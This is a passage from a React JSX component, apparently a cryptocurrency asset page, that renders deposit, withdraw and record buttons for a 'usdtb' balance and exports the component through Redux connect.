                <div className='w-full mt-5 mb-4 gap-3 text-white text-xs text-center flex flex-row justify-center items-center'>
                    <span onClick={()=>openDep("usdtb")} className='w-1/3 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.存入')}</span>
                    <span onClick={()=>openTi("usdtb")} className='w-1/3 my-4 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.提取')}</span>
                    <span onClick={()=>goLiushui("/record_usdtb")} className='w-1/3 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.记录')}</span>
                </div>
                
            </div>

                
            </div>
           
        
                <Foot/>
        </>
    );
}

export default connect(mapStateToProps)(IndexTest2);
